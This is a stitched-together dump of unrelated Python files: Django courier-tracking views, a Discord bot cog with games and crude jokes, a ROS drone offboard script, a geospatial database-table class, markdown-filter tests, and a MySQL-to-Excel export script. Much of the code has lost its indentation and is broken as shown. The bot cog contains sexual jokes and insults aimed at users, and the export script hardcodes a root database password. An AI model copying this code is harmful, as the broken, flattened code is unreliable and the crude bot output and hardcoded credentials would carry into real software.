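# Illustrative usage sketch (not part of the original models; assumes an app
# context and an initialised `db` session): the write-only password property
# stores only a hash, and Idea/Comments expose small save/query helpers.
#
# user = User(username='demo', email='demo@example.com')
# user.password = 'secret'                 # hashed via generate_password_hash
# user.verify_password('secret')           # -> True; the plain text is never stored
# db.session.add(user)
# db.session.commit()                      # assigns user.id
# idea = Idea(title='First idea', description='...', idea='...', user_id=user.id)
# idea.save_idea()
# Comments(comment='nice one', idea_id=idea.id, user_id=user.id).save_comment()
# Comments.get_comment(idea.id)            # -> list of comments for that idea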
|
from django.http.response import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from datetime import datetime
from django.contrib import messages
from django.shortcuts import get_object_or_404, redirect, render
from django.views import generic
from .models import Post
from .forms import NewCourier,UpdateCourier,HandOverForm
from django.contrib.admin.views.decorators import staff_member_required
from DispatchAPI.models import EmailMapping, MobileNumberMapping
from django.core.mail import send_mail
'''
Main view
'''
class Home(generic.base.TemplateView):
template_name='index.html'
'''
Search View for a courier
'''
class SearchCourier(generic.ListView):
queryset=Post.objects.order_by('-Received_On')
template_name='search_courier.html'
'''
Specific view of a post
'''
class PostSpecific(generic.DetailView):
model=Post
template_name='post_specific.html'
'''
Adds new courier
'''
@login_required
@staff_member_required
def AddCourier(request):
if request.method=="POST":
form=NewCourier(request.POST or None)
if form.is_valid():
form.save()
current=Post.objects.filter(
PODnumber=form.cleaned_data['PODnumber'],
StudentName=form.cleaned_data['StudentName'],
FromName=form.cleaned_data['FromName'],
Email=form.cleaned_data['Email'],
RollNumber=form.cleaned_data['RollNumber'],
Mobile=form.cleaned_data['Mobile'],
OtherInformation=form.cleaned_data['OtherInformation'],
)[0]
messages.add_message(request,messages.INFO,current.getCourierId())
#CurrentDT=datetime.now().strftime("%B %d, %Y")+" at "+datetime.now().strftime("%H:%M:%S")
#DiscordWebhook.Notify(current.getCourierId(),current.getFromName(),current.getStudentName(),current.getRollNumber(),current.getEmail(),current.getMobile(),CurrentDT,current.getOtherInfo(),False)
notified=False
email=current.getEmail()
mobile=current.getMobile()
if email:
possibilities=EmailMapping.objects.filter(ParentMail__iexact=email)
if possibilities.count()>0:
notified=True
#send_mail(current)
print(f"Send mail to {email}")
else:
possibilities=EmailMapping.objects.filter(ChildMail__iexact=email)
if possibilities:
for possiblity in possibilities:
if possiblity.Verified:
notified=True
#send_mail(possiblity)
print(f"Sent mail to {possiblity.ParentMail}")
if not notified and mobile:
possibilities=MobileNumberMapping.objects.filter(ChildNumber__iexact=mobile)
if possibilities:
for possiblity in possibilities:
if possiblity.Verified:
notified=True
#send_mail(possiblity)
print(f"Sent mail to {possiblity.ParentMail}")
            current.Notified=notified
            current.save()
messages.success(request,"Courier has been added successfully!")
if notified:
messages.success(request,"Sent notification successfully!")
else:
messages.warning(request,"Couldn't send notification.")
return HttpResponseRedirect('/')
        return render(request,"add_courier.html",{'form':form})
else:
form=NewCourier()
return render(request,'add_courier.html',{'form':form})
'''
Allows admins to edit courier details
'''
@login_required
@staff_member_required
def EditCourier(request,pk,*args,**kwargs):
CourierObj=get_object_or_404(Post,pk=pk)
if request.method=='POST':
UpdatedPost=UpdateCourier(request.POST,instance=CourierObj)
if UpdatedPost.is_valid():
UpdatedPost.save()
messages.success(request,"Courier has been updated successfully!")
messages.warning(request,"Changes are NOT notified.")
return redirect('search')
else:
UpdatedPost=UpdateCourier(instance=CourierObj)
return render(request,"edit_courier.html",{"original_post":CourierObj,"updated_post":UpdatedPost})
'''
Marks courier as received by student
'''
@login_required
@staff_member_required
def HandOver(request,pk,*args,**kwargs):
ExistingObj=get_object_or_404(Post,pk=pk)
if request.method=='POST':
UpdatedObj=HandOverForm(request.POST,instance=ExistingObj)
if UpdatedObj.is_valid():
ExistingObj.Collected=True
ExistingObj.Collected_On=datetime.now()
UpdatedObj.save()
messages.success(request,"Courier has been updated successfully!")
return redirect('home')
else:
UpdatedObj=HandOverForm(instance=ExistingObj)
return render(request,"hand_over.html",{"existing_post":ExistingObj,"updated_post":UpdatedObj})
'''
Deletes a Courier
'''
@login_required
@staff_member_required
def DeleteCourier(request,pk=None):
post=Post.objects.get(CourierId=pk)
post.delete()
messages.success(request,"Courier has been deleted successfully!")
return HttpResponseRedirect('/search')
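# Hedged sketch (assumption, not from the original project): one way the URL
# patterns for the views above could be wired up. The route names 'home' and
# 'search' are taken from the redirect() calls above; the remaining paths are
# illustrative only.
#
# from django.urls import path
# from . import views
#
# urlpatterns = [
#     path('', views.Home.as_view(), name='home'),
#     path('search/', views.SearchCourier.as_view(), name='search'),
#     path('post/<int:pk>/', views.PostSpecific.as_view(), name='post_specific'),
#     path('add/', views.AddCourier, name='add_courier'),
#     path('edit/<int:pk>/', views.EditCourier, name='edit_courier'),
#     path('handover/<int:pk>/', views.HandOver, name='hand_over'),
#     path('delete/<int:pk>/', views.DeleteCourier, name='delete_courier'),
# ]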
|
import discord
from discord.ext import commands
import random
import re
class Fun:
def __init__(self, client):
self.client = client
# Say message then delete author message
@commands.command(pass_context=True, no_pm=True)
async def say(self, ctx, *, words):
await self.client.delete_message(ctx.message)
await self.client.say(words)
# Random dick size
@commands.command(pass_context=True)
async def dick(self, ctx):
author = ctx.message.author
size = random.randint(1, 15)
# Make dick
output = '8'
for i in range(size):
output += '='
output += 'D'
# Hard or soft
list = ['hard :eggplant:', 'soft :banana:']
flaccidity = random.choice(list)
await self.client.say("**{0.mention}** has a ".format(author) + str(size) + " inch dick " + flaccidity + " " + output)
# Where you from? IM THE FROM THE 6IX YOU WASTEYUTE
@commands.command(pass_context=True)
async def wasteman(self, ctx):
author = ctx.message.author
salutations = ["yo", "ay"]
people = ["shordy", "wasteyute", "ahlie", "cyattie", "gyal", "mandem", "ting", "mans", "bean", "fam", "sweetermenz", "bucktee", "my g", "kawhi", "danaya"]
adjectives = ["bare", "mad", "bad", "bored", "cheesed", "dry"]
phrases = ["nyeahhhh", "don't cheese me", "that's wild", "i like nav", "drake can suck my cock", "scoop me", "copped", "hooooly", "flex", "lowe it", "that's beat", "mans are marved"]
sentences = [f"{random.choice(salutations)} {author.mention}, you're such a {random.choice(adjectives)} {random.choice(people)}",
f"{random.choice(people)} {random.choice(phrases)} yo",
f"{random.choice(salutations)}, {random.choice(phrases)} {random.choice(people)}, {random.choice(phrases)}",
f"{random.choice(phrases)}, why am i such a {random.choice(adjectives)} {random.choice(people)} its crazy {random.choice(people)}",
f"{random.choice(phrases)} i'm {random.choice(adjectives)} fam",
f"{random.choice(phrases)} {random.choice(phrases)} {random.choice(salutations)}"]
await self.client.say(random.choice(sentences))
# Rock Paper Scissors 1 == Rock 2 == Paper 3 = Scissors
@commands.command(pass_context=True)
async def rps(self, ctx):
aiChoice = 0
playerChoice = 0
author = ctx.message.author
bot = self.client.user.name
# Check for emojis
def check(reaction, author):
e = str(reaction.emoji)
return e.startswith(('🗿', '📄', '✂'))
# AI choice
aiChoice = random.randint(1, 3)
choiceList = {1: '🗿', 2: '📄', 3: '✂'}
# Create embedded message
embed = discord.Embed(description = "Choose rock 🗿, paper 📄, or scissors ✂!", colour = discord.Colour.darker_grey())
embed.set_footer(text=bot+' by ian#4359')
embed.set_author(name="Rock Paper Scissors")
# Initial message
msg = await self.client.say(embed=embed)
for emoji in choiceList:
await self.client.add_reaction(msg, choiceList[emoji])
# Wait for choice
choice = await self.client.wait_for_reaction(message=msg, check=check, user=author)
#Player choice
if ("{0.emoji}".format(choice.reaction)) == "🗿": playerChoice = 1
if ("{0.emoji}".format(choice.reaction)) == "📄": playerChoice = 2
if ("{0.emoji}".format(choice.reaction)) == "✂": playerChoice = 3
# Check for win
        if (playerChoice == 1 and aiChoice == 3) or (playerChoice == 2 and aiChoice == 1) or (playerChoice == 3 and aiChoice == 2):
embed = discord.Embed(description="{0} beats {1}".format(choiceList[playerChoice], choiceList[aiChoice]), colour = discord.Colour.green())
embed.set_footer(text=bot+' by ian#4359')
embed.set_author(name="{0.name} Wins".format(author).title())
await self.client.edit_message(msg, embed=embed)
# Tie
elif playerChoice == aiChoice:
embed = discord.Embed(description="You both chose {0}".format(choiceList[playerChoice]), colour = discord.Colour.blue())
embed.set_footer(text=bot+' by ian#4359')
embed.set_author(name="{0.name} Tied".format(author).title())
await self.client.edit_message(msg, embed=embed)
# Player loses
else:
embed = discord.Embed(description="{0} beats {1}".format(choiceList[aiChoice], choiceList[playerChoice]), colour = discord.Colour.red())
embed.set_footer(text=bot+' by ian#4359')
embed.set_author(name="{0.name} Loses".format(author).title())
await self.client.edit_message(msg, embed=embed)
# Coin flipper
@commands.command(pass_context=True)
async def coin(self, ctx):
author = ctx.message.author
bot = self.client.user.name
# Coin variables
coins = {1: '🔴', 2:'🔵'}
aiChoice = random.randint(1, 2)
# Create embed
embed = discord.Embed(description = "Heads 🔴 or tails 🔵?", colour = discord.Colour.darker_grey())
embed.set_footer(text=bot+' by ian#4359')
embed.set_author(name="Coin Toss")
# Send initial message
msg = await self.client.say(embed=embed)
for emoji in coins:
await self.client.add_reaction(msg, coins[emoji])
# Check for emojis
def check(reaction, author):
e = str(reaction.emoji)
return e.startswith(('🔴', '🔵'))
# Wait for player choice
choice = await self.client.wait_for_reaction(message=msg, check=check, user=author)
if ("{0.emoji}".format(choice.reaction)) == "🔴": playerChoice = 1
if ("{0.emoji}".format(choice.reaction)) == "🔵": playerChoice = 2
# Guessed right
        if (playerChoice == 1 and aiChoice == 1) or (playerChoice == 2 and aiChoice == 2):
embed = discord.Embed(description = "Lucky ass rng, you're right, it's {0}".format(coins[playerChoice]), colour = discord.Colour.green())
embed.set_footer(text=bot+' by ian#4359')
embed.set_author(name="You won!")
await self.client.edit_message(msg, embed=embed)
# Guessed wrong
else:
embed = discord.Embed(description = "lol nice rng idiot, you lost, it's {0}".format(coins[aiChoice]), colour = discord.Colour.red())
embed.set_footer(text=bot+' by ian#4359')
embed.set_author(name="You lost..")
await self.client.edit_message(msg, embed=embed)
# Random number generator
@commands.command(pass_context=True)
async def random(self, ctx, *, rangeOfNumbers):
try:
rangeOfNumbers = rangeOfNumbers.strip()
# Parse rangeOfNumbers into array
numbers = re.split(r"\s|-|-\s", rangeOfNumbers)
# Between 2 given numbers (E.g. 50-100)
if(len(numbers) == 2):
left = int(numbers[0])
right = int(numbers[1])
if left > right:
await self.client.say(f"Number generated from ({right}-{left}): **{random.randint(right, left):0{len(str(left))}d}**")
else:
await self.client.say(f"Number generated from ({left}-{right}): **{random.randint(left, right):0{len(str(right))}d}**")
# Between 0 and rangeOfNumbers (E.g. 0-10)
elif(len(numbers) == 1):
await self.client.say(f"Number generated from (0-{rangeOfNumbers}): **{random.randint(0, int(rangeOfNumbers)):0{len(str(rangeOfNumbers))}d}**")
            # Too many arguments
else:
await self.client.say("Too many arguments :confused: ")
except ValueError:
await self.client.say("Has to be a number Bobby.")
def setup(client):
client.add_cog(Fun(client))
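# Hedged usage sketch (assumption, not from the original file): this cog targets
# the old discord.py "async" branch API (client.say, pass_context=True,
# wait_for_reaction). Loading it from a bot script could look like the lines
# below; the module name 'fun' and the command prefix are illustrative only.
#
# from discord.ext import commands
# client = commands.Bot(command_prefix='!')
# client.load_extension('fun')   # assumes this file is saved as fun.py
# client.run('YOUR_TOKEN')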
|
#!/usr/bin/env python
import rospy
from mavros_msgs.msg import State
from mavros_msgs.srv import CommandBool, SetMode
from geometry_msgs.msg import Pose, PoseStamped, Point, Quaternion
import math
import numpy
from geometry_msgs.msg import Twist
from std_msgs.msg import Header
from threading import Thread
x=1
print(x)
def start1():
global x
rate = rospy.Rate(20) # Hz
if x==1:
        print("Arming")
        result = arming_srv(value=True)
        print(result)
        print("Setting Offboard Mode")
        result = mode_srv(custom_mode="OFFBOARD")
        print(result)
        x=0
        print("position_set")
while not rospy.is_shutdown():
        print("Setting Offboard Mode")
        result = mode_srv(custom_mode="OFFBOARD")
        print(result)
x=0
pos=set_p()
pos.header.stamp = rospy.Time.now()
vel_pub.publish(pos)
try:
rate.sleep()
except rospy.ROSInterruptException:
pass
def state_cb(msg):
    print(msg)
def set_p():
pos=PoseStamped()
pos.header = Header()
#enter position for the drone
pos.pose.position.x=0
pos.pose.position.y=0
pos.pose.position.z=5.0
return pos
if __name__ == '__main__':
rospy.init_node('subnode', anonymous=True)
vel_pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped,queue_size=1)
arming_srv = rospy.ServiceProxy("/mavros/cmd/arming", CommandBool)
mode_srv = rospy.ServiceProxy("/mavros/set_mode", SetMode)
    # run the setpoint streaming loop in a background thread so the node can
    # also register the state subscriber and process callbacks
    pos_thread = Thread(target=start1, args=())
    pos_thread.daemon = True
    pos_thread.start()
    state_sub = rospy.Subscriber('/mavros/state', State, callback=state_cb)
    rospy.spin()
|
from abc import ABC, abstractmethod
import logging
from logging import Logger
from pathlib import Path
import socket
from typing import Any, Generator, Mapping, Sequence, Union
from pyproj import CRS
from shapely.geometry import LinearRing, MultiPolygon, Polygon
from shapely.geometry.base import BaseGeometry, GEOMETRY_TYPES
from tablecrow.utilities import convert_value, get_logger, parse_hostname
DEFAULT_CRS = CRS.from_epsg(4326)
class TableNotFoundError(FileNotFoundError):
pass
class DatabaseTable(ABC):
DEFAULT_PORT = NotImplementedError
FIELD_TYPES: {str: str} = NotImplementedError
def __init__(
self,
resource: str,
table_name: str,
database: str = None,
fields: {str: type} = None,
primary_key: Union[str, Sequence[str]] = None,
crs: CRS = None,
username: str = None,
password: str = None,
users: [str] = None,
logger: Logger = None,
):
"""
Create a new database table interface.
:param resource: URL of database server as `hostname:port`
:param table_name: name of table in database
:param database: name of database in server
:param fields: dictionary of fields
:param primary_key: primary key field(s)
:param crs: coordinate reference system of table geometries
        :param username: username to connect to database
:param password: password to connect to database
:param users: list of database users / roles
"""
self.__database = database
self.__name = table_name
self.__fields = fields
if logger is None:
logger = get_logger('dummy', console_level=logging.NOTSET)
self.logger = logger
if resource is not None:
if Path(resource).exists():
port = None
else:
credentials = parse_hostname(resource)
resource = credentials['hostname']
port = credentials['port']
if port is None:
port = self.DEFAULT_PORT
if username is None:
username = credentials['username']
if password is None:
password = credentials['password']
else:
port = None
self.__resource = resource
self.__port = port
if username is not None and ':' in username:
username, password = username.split(':', 1)
self.__username = username
self.__password = password
if primary_key is None:
primary_key = [list(self.fields)[0]] if self.fields is not None else None
elif not isinstance(primary_key, Sequence) or isinstance(primary_key, str):
primary_key = [primary_key]
self.__primary_key = primary_key
if crs is not None:
crs = parse_crs(crs)
elif len(self.geometry_fields) > 0:
crs = DEFAULT_CRS
self.logger.warning(
f'no CRS provided for geometry fields; defaulting to EPSG:{crs.to_epsg()}'
)
else:
crs = None
self.__crs = crs
if users is None:
users = []
self.__users = users
if self.fields is None and not self.exists:
raise TableNotFoundError(
f'fields must be specified when creating a table; table does not exist at "{self.database}:{self.name}"'
)
@property
def resource(self) -> str:
return self.__resource
@property
def port(self) -> int:
return self.__port
@property
def database(self) -> str:
return self.__database
@property
def name(self) -> str:
return self.__name
@property
def fields(self) -> {str: type}:
if self.__fields is None:
self.__fields = self.remote_fields
return self.__fields
@property
def primary_key(self) -> [str]:
return self.__primary_key
@property
def crs(self) -> CRS:
return self.__crs
@property
def username(self) -> str:
return self.__username
@property
def users(self) -> [str]:
return self.__users
@property
@abstractmethod
def exists(self) -> bool:
raise NotImplementedError
@property
@abstractmethod
def schema(self) -> str:
""" SQL schema string """
raise NotImplementedError
@property
def geometry_fields(self) -> {str: type}:
""" local fields with geometry type """
geometry_fields = {}
if self.fields is not None:
for field, field_type in self.fields.items():
while isinstance(field_type, Sequence) and not isinstance(field_type, str):
if len(field_type) > 0:
field_type = field_type[0]
else:
field_type = list
if field_type.__name__ in GEOMETRY_TYPES:
geometry_fields[field] = field_type
return geometry_fields
@property
@abstractmethod
def remote_fields(self) -> {str: type}:
""" fields at remote table """
raise NotImplementedError
@property
def connected(self) -> bool:
""" whether network connection exists to database server """
try:
socket.setdefaulttimeout(2)
socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect(
(self.resource, self.port)
)
return True
except socket.error:
return False
@property
def records(self) -> [{str: Any}]:
""" list of records in the table """
return self.records_where(None)
@abstractmethod
def records_where(
self, where: Union[Mapping[str, Any], str, Sequence[str]]
) -> [{str: Any}]:
"""
list of records in the table that match the query
:param where: dictionary mapping keys to values, with which to match records
:return: dictionaries of matching records
"""
raise NotImplementedError
@abstractmethod
def insert(self, records: [{str: Any}]):
"""
insert the list of records into the table
:param records: dictionary records
"""
raise NotImplementedError
@abstractmethod
def delete_where(self, where: Union[Mapping[str, Any], str, Sequence[str]]):
"""
delete records from the table matching the given query
:param where: dictionary mapping keys to values, with which to match records
"""
raise NotImplementedError
def __getitem__(self, key: Any) -> {str: Any}:
"""
Return the record matching the given primary key value.
:param key: value of primary key
:return: dictionary record
"""
if isinstance(key, dict):
if not all(field in key for field in self.primary_key):
raise ValueError(f'does not contain "{self.primary_key}"')
where = key
else:
if isinstance(key, Generator):
key = list(key)
elif not isinstance(key, Sequence) or isinstance(key, str):
key = [key]
if len(key) != len(self.primary_key):
raise ValueError(f'ambiguous value for primary key "{self.primary_key}"')
where = {field: key[index] for index, field in enumerate(self.primary_key)}
if not self.connected:
raise ConnectionError(
f'no connection to {self.username}@{self.resource}:{self.port}/{self.database}/{self.name}'
)
try:
records = self.records_where(where)
if len(records) > 1:
self.logger.warning(
f'found more than one record matching query {where}: {records}'
)
if len(records) > 0:
return records[0]
else:
raise KeyError(f'no record with primary key "{key}"')
except:
raise KeyError(f'no record with primary key "{key}"')
def __setitem__(self, key: Any, record: {str: Any}):
"""
Insert the given record into the table.
:param key: value of primary key at which to insert record
:param record: dictionary record
"""
if isinstance(key, Generator):
key = list(key)
elif isinstance(key, dict):
if not all(field in key for field in self.primary_key):
raise KeyError(f'does not contain "{self.primary_key}"')
key = [key[field] for field in self.primary_key]
elif not isinstance(key, Sequence) or isinstance(key, str):
key = [key]
for key_index, primary_key in enumerate(self.primary_key):
record[primary_key] = key[key_index]
if not self.connected:
raise ConnectionError(
f'no connection to {self.username}@{self.resource}:{self.port}/{self.database}/{self.name}'
)
self.insert([record])
def __delitem__(self, key: Any):
"""
Delete the record matching the given primary key value.
:param key: value of primary key
"""
if isinstance(key, dict):
if not all(field in key for field in self.primary_key):
raise ValueError(f'does not contain "{self.primary_key}"')
where = key
else:
if isinstance(key, Generator):
key = list(key)
elif not isinstance(key, Sequence) or isinstance(key, str):
key = [key]
if len(key) != len(self.primary_key):
raise ValueError(f'ambiguous value for primary key "{self.primary_key}"')
where = {field: key[index] for index, field in enumerate(self.primary_key)}
if not self.connected:
raise ConnectionError(
f'no connection to {self.username}@{self.resource}:{self.port}/{self.database}/{self.name}'
)
try:
self.delete_where(where)
except:
raise KeyError(f'no record with primary key "{key}"')
def __len__(self) -> int:
return len(self.records)
def __contains__(self, key: Any) -> bool:
if not self.connected:
raise ConnectionError(
f'no connection to {self.username}@{self.resource}:{self.port}/{self.database}/{self.name}'
)
try:
self[key]
return True
except KeyError:
return False
def __iter__(self) -> Generator:
yield from self.records
@abstractmethod
def delete_table(self):
raise NotImplementedError
def __repr__(self) -> str:
return (
f'{self.__class__.__name__}({repr(self.database)}, {repr(self.name)}, {repr(self.fields)}, {repr(self.primary_key)}, '
            f'{repr(self.resource)}, {repr(self.username)}, {repr("*" * len(self.__password or ""))}, {repr(self.users)})'
)
def random_open_tcp_port() -> int:
open_socket = socket.socket()
open_socket.bind(('', 0))
return open_socket.getsockname()[1]
def crs_key(crs: CRS) -> str:
if not isinstance(crs, CRS):
crs = parse_crs(crs)
return crs.wkt.split('"')[1]
def is_compound_crs(crs: CRS) -> bool:
if not isinstance(crs, CRS):
crs = parse_crs(crs)
return 'COMPD_CS' in crs.wkt or 'COMPOUNDCRS' in crs.wkt
def split_compound_crs(crs: CRS) -> [CRS]:
"""
Split the given compound coordinate reference system into its constituent CRS parts.
:param crs: compound CRS
:returns: list of CRS parts
"""
if type(crs) is not CRS:
crs = parse_crs(crs)
if is_compound_crs(crs):
working_string = crs.wkt
# remove the compound CRS keyword and name from the string, along with the closing bracket
working_string = working_string.split(',', 1)[-1][:-1]
wkts = []
while len(working_string) > 0:
opening_brackets = 0
closing_brackets = 0
for index, character in enumerate(working_string):
if character == '[':
opening_brackets += 1
elif character == ']':
closing_brackets += 1
if opening_brackets > 0 and opening_brackets == closing_brackets:
wkts.append(working_string[: index + 1])
working_string = working_string[index + 2 :]
break
else:
wkts.append(working_string)
break
return [CRS.from_string(wkt) for wkt in wkts]
def compound_crs(crs_list: [CRS], key: str = None) -> CRS:
"""
Build a compound coordinate reference system from the provided list of constituent CRSs.
:param crs_list: list of coordinate reference systems
:param key: name of CRS
:returns: compound CRS
"""
crs_list = [crs if type(crs) is CRS else parse_crs(crs) for crs in crs_list]
if key is None:
key = ' + '.join(crs_key(crs) for crs in crs_list)
# TODO is keyword specced as COMPOUNDCRS?
return CRS.from_string(f'COMPD_CS["{key}", {", ".join(crs.wkt for crs in crs_list)}]')
def parse_crs(crs: Union[str, int]) -> CRS:
"""
Parse a CRS object from the given well-known text or EPSG code.
:param crs: coordinate reference system; either well-known text or an EPSG code
:returns: CRS object
"""
if isinstance(crs, CRS):
return crs
elif (
isinstance(crs, str)
and '+' in crs
and 'COMPD_CS' not in crs
and 'COMPOUNDCRS' not in crs
):
return compound_crs([parse_crs(crs_part.strip()) for crs_part in crs.split('+')])
else:
try:
return CRS.from_epsg(int(crs))
except ValueError:
return CRS.from_string(str(crs))
def flatten_geometry(geometry: BaseGeometry) -> BaseGeometry:
geometry_type = type(geometry)
# strip 3rd dimension
if 'POLYGON Z' in geometry.wkt:
polygons = (
[polygon for polygon in geometry] if geometry_type is MultiPolygon else [geometry]
)
for polygon_index, polygon in enumerate(polygons):
exterior_2d = LinearRing([vertex[:2] for vertex in polygon.exterior.coords])
interiors_2d = [
LinearRing([vertex[:2] for vertex in interior.coords])
for interior in polygon.interiors
]
polygons[polygon_index] = Polygon(exterior_2d, interiors_2d)
geometry = (
MultiPolygon(polygons) if geometry_type is MultiPolygon else Polygon(polygons[0])
)
if not geometry.is_valid:
geometry = geometry.buffer(0)
return geometry
def parse_record_values(record: {str: Any}, field_types: {str: type}) -> {str: Any}:
"""
Parse the values in the given record into their respective field types.
:param record: dictionary mapping fields to values
:param field_types: dictionary mapping fields to types
:return: record with values parsed into their respective types
"""
for field, value in record.items():
if field in field_types:
field_type = field_types[field]
record[field] = convert_value(value, field_type)
return record
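# Illustrative usage sketch (not part of the original module): exercising the
# standalone CRS helpers defined above. The EPSG code is an example only.
if __name__ == '__main__':
    crs = parse_crs(4326)           # EPSG code -> pyproj CRS
    same = parse_crs('EPSG:4326')   # authority string -> the same CRS
    print(crs_key(crs))             # first quoted name in the WKT, e.g. 'WGS 84'
    print(is_compound_crs(crs))     # False: a plain geographic CRS is not compound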
|
import django
import pytest
from anylink.models import AnyLink
from markymark.templatetags.markymark import markdown_filter
from markymark.widgets import MarkdownTextarea
@pytest.mark.skipif(django.VERSION[0] >= 2, reason='Requires Django<2')
@pytest.mark.django_db
class TestFilerFileExtension:
def setup(self):
from .factories.files import FileFactory, ImageFactory
self.file = FileFactory.create()
self.image = ImageFactory.create()
def test_invalid_tag(self):
assert markdown_filter('foo [file:123 bar') == ('<p>foo [file:123 bar</p>')
def test_file_not_found_debug(self, settings):
from filer.models.filemodels import File
settings.DEBUG = True
with pytest.raises(File.DoesNotExist):
markdown_filter('[file:999]')
def test_file_not_found_no_debug(self, settings):
settings.DEBUG = False
assert markdown_filter('foo [file:999] bar') == ('<p>foo bar</p>')
def test_file_render_success(self):
expected = '<p><a href="{0}">{0}</a></p>'.format(self.file.url)
assert expected == markdown_filter('[file:{0}]'.format(self.file.pk))
def test_image_render_success(self):
expected = '<p><img src="{0}" alt="{1}" title="{2}"></p>'.format(
self.image.url, self.image.default_alt_text, self.image.default_caption)
assert expected == markdown_filter('[file:{0}]'.format(self.image.pk))
def test_media(self):
widget = MarkdownTextarea()
assert 'markymark/extensions/filer.css' in widget.media._css['all']
assert 'markymark/extensions/filer.js' in widget.media._js
@pytest.mark.django_db
class TestAnylinkExtension:
def setup(self):
self.link = AnyLink.objects.create(link_type='external_url', external_url='/test/')
def test_invalid_tag(self):
assert markdown_filter('foo [link:123 bar') == ('<p>foo [link:123 bar</p>')
def test_link_not_found_debug(self, settings):
settings.DEBUG = True
with pytest.raises(AnyLink.DoesNotExist):
markdown_filter('[link:999]')
def test_link_not_found_no_debug(self, settings):
settings.DEBUG = False
        assert markdown_filter('[link:999]') == '<p></p>'
def test_file_render_success(self):
expected = '<p><a href="{0}" title="" target="_self"></a></p>'.format(
self.link.external_url)
assert expected == markdown_filter('[link:{0}]'.format(self.link.pk))
class TestAutoLinkExtension:
def test_valid_http_link(self):
url = 'https://www.youtube.com/watch?v=FTuFVwnrcts'
expected = '<p><a href="{0}">{0}</a></p>'.format(url)
assert expected == markdown_filter(url)
def test_valid_mailto_link(self):
url = 'mailto:test@example.com'
expected = '<p><a href="{0}">test@example.com</a></p>'.format(url)
assert expected == markdown_filter(url)
def test_invalid_link(self):
url = 'www.example.com'
expected = '<p>{0}</p>'.format(url)
assert expected == markdown_filter(url)
def test_dont_render_link_twice_url(self):
url = '<a href="http://www.example.com/">test</a>'
expected = '<p>{0}</p>'.format(url)
assert expected == markdown_filter(url)
def test_dont_render_link_twice_name(self):
url = '<a href="http://www.example.com/">http://www.example.com/</a>'
expected = '<p>{0}</p>'.format(url)
assert expected == markdown_filter(url)
def test_dont_hijack_images(self):
        md = '![](https://mirrors.creativecommons.org/presskit/icons/cc.large.png)'
expected = (
'<p><img alt="" src="https://mirrors.creativecommons.org/presskit/'
'icons/cc.large.png" /></p>'
)
assert markdown_filter(md) == expected
|
"""
@author: David Lei
@since: 21/08/2016
@modified:
"""
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
# Download data into Excel
# Date for Version 2: 2020.04.08
import MySQLdb
import xlrd,xlwt
import time
from datetime import datetime
import os
def getData():
file_new = xlwt.Workbook(encoding = 'utf-8')
sheet_1 = file_new.add_sheet('main')
# prepare some settings
dateFormat = xlwt.XFStyle()
dateFormat.num_format_str = 'yyyy-mm-dd'
warning_style = xlwt.XFStyle()
fnt = xlwt.Font()
fnt.colour_index = 2
warning_style.font = fnt
tt = 60*60*24
s_date = int(datetime(1899, 12, 31).timestamp()/tt)-2
conn = MySQLdb.connect( host = 'localhost',
user = 'root',
passwd = '1',
db = 'Test',
charset= 'utf8')
conn.autocommit(1)
cur = conn.cursor()
base_col_names = ["name","sex","age","marriage","site","stage","surgery","radiotherapy","chemotherapy"]
lab_col_names = ["CEA","CA199"]
pathology_col_names = ["patho_diagnosis","lym_vas_invasion","tot_lymph_node","deep","pni","pos_lymph_node"]
surgery_col_names = ["resection_way"]
chemotherapy_col_names = ["chemo_way","chemo_way_other","last_chemo","chemo_time_0","chemo_time_1","chemo_time_2","chemo_way_0","chemo_way_1","chemo_way_2","desc_0","desc_1","desc_2"]
radiotherapy_col_names = ["radio_count","radio_start","radio_end"]
follow_up_col_names = ["recurrance"]
base_col_labels = ["姓名","性别","年龄","婚姻情况","肿瘤部位","分期","是否手术","是否放疗","是否化疗"]
lab_col_labels = ["CEA","CA199"]
pathology_col_labels = ["病理诊断","脉管癌栓","淋巴结数","浸润深度","神经侵犯","淋巴阳性"]
surgery_col_labels = ["手术方式"]
chemotherapy_col_labels = ["化疗方案","化疗方案_other","上次化疗时间","化疗时间_0","化疗时间_1","化疗时间_2","化疗方案_0","化疗方案_1","化疗方案_2","描述_0","描述_1","描述_2"]
radiotherapy_col_labels = ["放疗次数","放疗开始","放疗结束"]
follow_up_col_labels = ["是否复发"]
base_col = len(base_col_names)
lab_col = len(lab_col_names)
pathology_col = len(pathology_col_names)
surgery_col = len(surgery_col_names)
chemotherapy_col = len(chemotherapy_col_names)
radiotherapy_col = len(radiotherapy_col_names)
follow_up_col = len(follow_up_col_names)
sql = "SELECT patient_id,base,lab,pathology,surgery,chemotherapy,radiotherapy,follow_up FROM data_status"
cur.execute(sql)
patient_id = []
base_page_max = 0
lab_page_max = 0
pathology_page_max = 0
surgery_page_max = 0
chemotherapy_page_max = 0
radiotherapy_page_max = 0
follow_up_page_max = 0
for row in cur:
patient_id.extend([row[0]])
base_page_status = str(row[1])
base_page_status = str(int(base_page_status[::-1]))[::-1] # delete 0 in tail
base_page_max = max(base_page_max,len(base_page_status))
lab_page_status = str(row[2])
lab_page_status = str(int(lab_page_status[::-1]))[::-1] # delete 0 in tail
lab_page_max = max(lab_page_max,len(lab_page_status))
pathology_page_status = str(row[3])
pathology_page_status = str(int(pathology_page_status[::-1]))[::-1] # delete 0 in tail
pathology_page_max = max(pathology_page_max,len(pathology_page_status))
surgery_page_status = str(row[4])
surgery_page_status = str(int(surgery_page_status[::-1]))[::-1] # delete 0 in tail
surgery_page_max = max(surgery_page_max,len(surgery_page_status))
chemotherapy_page_status = str(row[5])
chemotherapy_page_status = str(int(chemotherapy_page_status[::-1]))[::-1] # delete 0 in tail
chemotherapy_page_max = max(chemotherapy_page_max,len(chemotherapy_page_status))
radiotherapy_page_status = str(row[6])
radiotherapy_page_status = str(int(radiotherapy_page_status[::-1]))[::-1] # delete 0 in tail
radiotherapy_page_max = max(radiotherapy_page_max,len(radiotherapy_page_status))
follow_up_page_status = str(row[7])
follow_up_page_status = str(int(follow_up_page_status[::-1]))[::-1] # delete 0 in tail
follow_up_page_max = max(follow_up_page_max,len(follow_up_page_status))
row_max = len(patient_id)
col_max = base_col*base_page_max + lab_col*lab_page_max + pathology_col*pathology_page_max + surgery_col*surgery_page_max + chemotherapy_col*chemotherapy_page_max + radiotherapy_col*radiotherapy_page_max + follow_up_col*follow_up_page_max + 1
